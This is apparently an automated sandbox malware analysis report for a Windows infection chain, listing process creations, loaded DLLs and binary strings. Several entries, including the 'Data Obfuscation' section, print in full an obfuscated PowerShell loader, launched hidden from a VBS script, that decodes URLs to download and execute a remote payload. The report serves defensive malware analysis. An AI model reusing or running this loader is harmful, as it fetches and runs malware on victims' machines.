          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\vh27dw.vbs'"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: ion.pdbXI source: powershell.exe, 00000000.00000002.2376849387.00000256F9F80000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2180268531.000001C49BB9B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb~ source: powershell.exe, 00000006.00000002.3477541721.0000028A6DF3F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2374596360.00000256F9D60000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32: source: powershell.exe, 00000003.00000002.2182806236.000001C49BD5B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000000.00000002.2374596360.00000256F9D83000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: utomation.pdbre& source: powershell.exe, 00000003.00000002.2181445765.000001C49BC58000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb[= source: powershell.exe, 00000003.00000002.2179529206.000001C49B975000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2182639588.000001C49BD09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.2182639588.000001C49BD09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2377549383.00000256FA04A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: indows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2377549383.00000256FA04A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: scorlib.pdblT source: powershell.exe, 00000000.00000002.2377549383.00000256FA04A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Z1Rn.pdb source: powershell.exe, 00000003.00000002.2182169653.000001C49BCEB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdb.pdb source: powershell.exe, 00000006.00000002.3477541721.0000028A6DF3F000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Obfuscated command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC 